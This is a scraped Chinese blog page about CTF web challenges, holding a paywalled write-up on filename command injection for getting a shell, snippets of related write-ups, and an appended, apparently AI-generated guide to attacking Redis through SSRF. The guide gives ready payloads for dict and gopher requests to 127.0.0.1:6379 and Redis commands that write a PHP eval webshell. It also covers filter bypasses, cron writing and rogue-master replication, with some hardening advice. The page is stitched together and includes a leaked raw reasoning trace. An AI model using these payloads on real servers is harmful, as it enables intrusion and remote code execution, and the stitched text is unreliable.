利用文件名进行GetShell---CTF题目的相关知识解析

最新推荐文章于 2025-05-21 21:39:56 发布
最新推荐文章于 2025-05-21 21:39:56 发布
阅读量3.8k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: WEB安全 文章标签: 安全 WAF绕过 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/rigous/article/details/78570201
本文详细介绍了如何通过CTF题目学习文件名注入和命令执行技巧。首先,分析了Apache服务器的端口映射配置。接着,针对登录绕过问题,通过代码审计发现逻辑漏洞,成功绕过验证。然后,利用未过滤的%0a字符执行命令注入,但由于长度限制和权限问题,最终借助自动化脚本在upload目录创建了WebShell。此外,还补充了Linux文件名限制和wget命令的使用细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 环境

今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一在/va/www目录下主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。


随后找了一个看似比较简单的题目尝试一下,解题之前我比较好奇是如何映射的端口,过程不表。

8081-8084是通过apache服务器进行的映射。配置文件位于/etc/apache2/ports.conf,关键点在下图中的四个listen


apache监听后设置虚拟机的虚拟端口,配置文件可以从ports.conf文件中获取。


<VirtualHost *:8081>
        ServerAdmin webmaster@localhost
DocumentRoot /var/www/8081
        <Directory "/var/www/8081">
                Options Indexes FollowSymLinks
                AllowOverride All
                AllowOverride All
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>
<VirtualHost *:8082>
        ServerAdmin webmaster@localhost
DocumentRoot /var/www/8082
        <Directory "/var/www/8082">
                Options Indexes FollowSymLinks
                AllowOverride All
                AllowOverride All
                Order allow,deny
                Allow from all
        </Directory>
</VirtualHost>


<VirtualHost *:8083>
        ServerAdmin webmaster@localhost
DocumentRoot /var/www/8083
        <Directory "/var/www/8083">
                Options Indexes FollowSymLinks
                AllowOverride All
                AllowOverride All
  &nb

最低0.47元/天 解锁文章

200万优质内容无限畅学
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4711
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
CTF-2021中国能源网络WEB题目全解
wulanlin的博客
12-31 1179
0x01 前言 在2021年10月15日的“中国能源网络安全大赛”,笔者对WEB题目进行了尝试,幸运的做出了所有题目。 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以笔者将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 下面笔者将分享这次比赛的解题过程。 0x02 ezphp 这是一道很简单的题目,同时也被大家刷成了签到题。
BugKuCTF中套路满满的题--------getshell
qq_42133828的博客
12-19 1011
这道题目是一个关于文件上传的题目, 而他的绕过机制是黑名单检测和类型检测 黑名单检测:使用php5绕过,其他的(php3,phtml,php4.。。)都绕不过 类型检测:抓包,改参数filename:2.php5  ,有两个Content-Type,先改第二个的Content-Type:image/jpeg  ,再改第一个的Content-Type:Multipart/form-data; ...
攻防世界——Web题 fakebook
2401_88083440的博客
05-21 1145
如果直接使用data传入序列化字符串,是不是就能经反序列化函数解析为UserInfo对象,从而读取该对象的blog值,执行请求并返回响应内容呢!在绕过的同时,我开始扫目录。发现这里有 curl ,可执行请求并返回响应内容,这里我想到的就是搭配file://进行读取了,还有一个原因是:当我访问flag.php、db.php等等,发现返回的内容都为空,但这里应该就是flag.php!于是猜测这里应该是对 union select 整体的一个绕过,如果使用 union/**/select ,发现可以绕过
bugku ctfgetshell
qq_42777804的博客
08-02 563
打开之后 是 文件上传 但是不可以上传 php文件 说明存在过滤 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如mulTipart/form-data (其中t为大写) 所上传的文...
一道二次注入GetshellCTF
Lethe's Blog
03-03 4344
这道题是CUMT第二次双月赛的一道web题,在上一篇wp:CUMT第二次双月赛——Web详解中已经详细分析过了,由于我刚入门,觉得在这道题中收获了很多知识,所以想单独放在一篇文章中,方便之后分类查阅。 关于什么是二次注入,可参考:SQL二次注入 下面进入题目: 文件管理系统 1、先扫目录,发现可以下载源码,进行代码审计。 2、查看upload.php代码,发现是如下白名单验证,无法上传绕过。 ...
CTF之Bukg 求getshell
weixin_41607190的博客
11-03 324
随便上传一个jpg文件,抓包修改请求的信息 要改的地方有三处 一个是Content-Type中的值大小写改一下,这里不是很明白,留个坑 第二个改后缀名,php5没有过滤 然后就是文件类型 image/jpeg ...
Bugku CTF_Web——getshell
weixin_71914594的博客
11-08 436
蚁剑里有个插件可以绕过disable_functions。密码还是和连接第一次的密码一样。放进解密在线网站解一下。再连接新生成的绕过木马。一个混淆类php代码。连接后慢慢找flag。
ctf-web
weixin_43150428的博客
11-04 2989
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
BugkuCTF(old)----流量分析题目Writeup
Au
09-26 2031
flag被盗 文件不是很大,粗略看了一下,发现了shell.php字段 筛选为http流量,追踪TCP查看 直接得到flagflag{This_is_a_f10g} 中国菜刀 下载解压得到数据包,比较小只有7kb 只有TCP和HTTP协议流量,追踪TCP流查看,发现flag.tar.gz压缩包 使用kali集成的 binwa...
NSSCTF-Web题目27(Nginx漏洞、php伪协议、php解析绕过)
weixin_54055099的博客
08-01 1210
nginx漏洞、php伪协议、php非法传参
CTF_Web:8位以内可控字符getshell
AFCC_的博客(Web_Dog)
08-04 1744
题目来源 近期在练习CTF中的web题目时遇到一个8位字符以内可以随意执行命令,最终需要getshell题目,发现很多前辈都写了这类型的题解,但也需要自己实践一下,题目源码访问后如图: 思路:可以看出当提交的参数1包含的值少于8位时,都会当作命令执行,首先?1=ls发现所有文件名都超过了8位,显然单靠这8位执行命令是不足以cat某个文件,于是需要利用拼接文件名执行代码getshell。 解题利用知识点 >a "在linux中会直接创建这个文件,但没有内容" ls -t "将目录中的文件以时间顺
[WUSTCTF 2020]getshell
沈理大学牲的博客
11-14 319
发现后门函数 shell,并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。
CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权
su__xiaoyan的博客
01-07 1582
实验环境 攻击者:Kali Linux(192.168.0.19) 靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.18) 实验流程 通过目录遍历漏洞getshell流程参考链接:https://blog.youkuaiyun.com/su__xiaoyan/article/details/111830830 ...
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 2023
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
CTF——PWN——栈溢出(4.getshell
qq_45215609的博客
09-19 447
CTF——PWN——栈溢出(4.getshell
[SUCTF 2018]GetShell
qq_43801002的博客
07-27 1411
题目 过程 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } } 发现可以上传php文件,访问过后发现,直
BUUCTF:[SUCTF 2018]GetShell
末初 · mochu7
08-01 2125
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
CTF大赛】100步getshell之就差一步——The MOVAPS issue
A_991128a的博客
01-05 582
本文主要对问题进行了解释,并结合DownUnderCTF2021和TamilCTF2021中相关的两个题目进行了分析。就题目本身而言,非常简单的ROP,考察的知识点就是,理解了就很容易。最近看到一句话,再次刷新了我的认知,RE不仅考的是reverse的技巧,还考察了Google和GIThub的技巧;Crypto不仅考察了你的数学知识,还考察了你阅读paper的能力。所以啊,你以为的真的是你以为的吗?世界那么大,多出去看看吧。参考文献。
ctf-ssrf-redis
最新发布
06-14
<think>我们正在讨论CTF比赛中与SSRF(Server-SideRequestForgery)和Redis相关的攻击或防御技巧。根据提供的引用,攻击者常利用SSRF漏洞通过特定的协议(如dict或gopher)与内网的Redis服务交互,进而实现未授权访问、写入Webshell或执行其他恶意操作。以下是相关的攻击技巧和防御方法的总结:###攻击技巧1.**利用dict协议攻击Redis**(引用[1]):-通过SSRF发送dict协议的请求到Redis服务,可以执行Redis命令。-典型攻击步骤:-设置Redis的工作目录:`configsetdir/var/www/html`-设置保存的文件名:`configsetdbfilenamewebshell.php`-写入Webshell内容:`settest"<?php@eval($_POST['cmd']);?>"`(注意:这里的引号需要正确转义)-保存:`save`-这样就在Web目录下写入了webshell.php文件,攻击者可以通过蚁剑等工具连接。2.**利用gopher协议攻击Redis**(引用[2]):-gopher协议功能更强大,可以发送多行命令。-使用工具(如gopherus)生成攻击payload:-生成Redis的payload:`./gopherus.py--exploitredis`-输入要执行的PHP代码(如`<?phpeval($_POST["123"]);?>`),生成gopher链接。-由于gopher协议在传输中需要正确编码,通常需要二次URL编码。-将生成的payload通过SSRF漏洞发送,即可在目标服务器上写入Webshell。3.**绕过过滤**(引用[3]):-题目中可能过滤了`file://`、`dict`、`127.0.0.1`、`localhost`等关键词。-绕过方法:-使用IP的十进制表示(如`2130706433`代表`127.0.0.1`)或`0.0.0.0`。-使用DNS重绑定技术。-使用非标准端口或协议(如http协议访问Redis的6379端口,但Redis不支持HTTP,所以通常用gopher或dict)。-利用URL解析特性,如`http://abc@127.0.0.1`、`http://127.0.0.1:80@evil.com`等。###防御技巧1.**过滤输入**:-对用户输入的URL进行严格检查,禁止访问内网IP和特殊协议(如dict、gopher)。-使用正则表达式过滤,但要注意绕过技巧(如IP的多种表示形式)。2.**限制协议**:-只允许HTTP/HTTPS协议,禁止其他协议。3.**网络隔离**:-将关键服务(如Redis)置于内网,并设置防火墙规则,禁止外部访问。4.**Redis安全配置**:-为Redis设置强密码认证。-限制Redis的绑定IP(不要绑定在0.0.0.0)。-以低权限用户运行Redis,并限制其文件写入权限。5.**使用SSRF防护机制**:-在服务端设置请求的目标地址白名单。-使用DNS解析并验证目标IP是否在允许范围内。###示例:攻击Redis写入Webshell假设存在SSRF漏洞,且内网Redis无认证,攻击者可以构造如下dict协议的请求(注意空格和换行需要正确编码):```dict://127.0.0.1:6379/configsetdir/var/www/htmldict://127.0.0.1:6379/configsetdbfilenameshell.phpdict://127.0.0.1:6379/settest"<?php@eval($_POST['cmd']);?>"dict://127.0.0.1:6379/save```但实际中,由于dict协议一次只能发送一个命令,且需要多个请求,因此通常使用gopher协议在一个请求中发送多个命令。###注意事项-CTF中,Redis可能运行在非默认端口或需要绕过过滤。-写入Webshell的路径需要可写,且Web服务器能够解析。§§相关问题§§1.如何防御SSRF攻击Redis?2.在CTF中,如果过滤了dict和gopher协议,还有哪些方法可以利用SSRF攻击Redis?3.Redis除了写入Webshell,还可以利用SSRF进行哪些攻击?</think>### CTF SSRF Redis攻击与防御技巧 在CTF比赛中,SSRF(服务端请求伪造)结合Redis的攻击是常见题型。以下是关键技巧总结: --- #### **攻击技巧(利用SSRF操作Redis)** 1. **协议利用** - **dict协议**:直接发送Redis命令(需URL编码) ```http dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html ``` - **gopher协议**(更强大):支持多行命令,常用工具`gopherus`生成Payload ```python # 生成Payload示例(自动处理换行编码) ./gopherus.py --exploit redis ``` 2. **写入Webshell** - 经典四步操作: ```redis CONFIG SET dir /var/www/html # 设置保存目录 CONFIG SET dbfilename shell.php # 设置文件名 SET payload "<?php eval($_POST['cmd']);?>" # 写入恶意代码 SAVE # 保存到文件 ``` - 需注意特殊字符转义(如`<`需转为`<`) 3. **绕过过滤** - **IP绕过**:用`0.0.0.0`、`2130706433`(127.0.0.1的整数形式)或`localhost`替代 - **协议绕过**:若过滤`dict/gopher`,尝试`http://0.0.0.0:6379/?`(需Redis支持HTTP) - **分块编码**:对Payload二次URL编码(引用[2]示例) 4. **其他利用方式** - 写计划任务:`CONFIG SET dir /var/spool/cron/` - 主从复制攻击:通过`SLAVEOF`命令控制Redis从恶意服务器加载模块 - 读取敏感文件:`CONFIG GET *`获取Redis配置 --- #### **防御技巧** 1. **输入过滤** - 协议黑名单:禁用`file://`、`dict://`、`gopher://` - IP/域名限制:过滤`127.0.0.1`、`localhost`、内网IP段 - 正则强化:检测异常路径(如`/var/spool/cron`) 2. **Redis加固** ```bash # 关键配置 bind 127.0.0.1 # 只监听本地 requirepass "强密码" # 启用认证 rename-command CONFIG "" # 禁用危险命令 ``` 3. **服务隔离** - 将Redis部署在内网,禁止公网访问 - 使用防火墙限制6379端口的来源IP 4. **权限控制** - Redis以低权限用户运行(非root) - 限制Web目录写权限(防止写Shell--- #### **CTF实战要点** 1. **判断Redis存在**:尝试访问`http://target:6379`若返回`-ERR wrong number of arguments`则存在。 2. **编码处理**: - 使用工具(如gopherus)自动生成编码后的Payload - 二次URL编码绕过WAF(引用[2]案例) 3. **回显利用**:若命令无回显,可通过延时或DNS外带数据判断执行结果。 > 参考案例:某CTF题通过SSRF的gopher协议发送Redis命令写入Webshell,最终用蚁剑连接获取flag(引用[2])。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值